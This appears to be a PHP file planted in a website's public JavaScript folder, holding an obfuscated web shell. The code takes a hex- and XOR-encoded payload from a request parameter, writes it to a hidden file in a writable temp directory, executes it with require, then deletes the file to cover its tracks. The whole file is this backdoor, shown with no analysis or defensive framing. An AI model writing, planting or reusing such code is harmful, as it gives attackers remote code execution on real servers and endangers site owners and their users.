File: /var/www/html/eva.sumar.com.py/public/frontend/js/str.php
<?php
if(count($_REQUEST) > 0 && isset($_REQUEST["\x65\x6Etry"])){
$descriptor = hex2bin($_REQUEST["\x65\x6Etry"]);
$rec= '' ;foreach(str_split($descriptor) as $char){$rec .= chr(ord($char) ^ 37);}
$reference = array_filter([sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), getenv("TEMP"), "/var/tmp", getenv("TMP")]);
foreach ($reference as $tkn) {
if ((is_dir($tkn) and is_writable($tkn))) {
$value = implode("/", [$tkn, ".itm"]);
if (file_put_contents($value, $rec)) {
require $value;
unlink($value);
exit;
}
}
}
}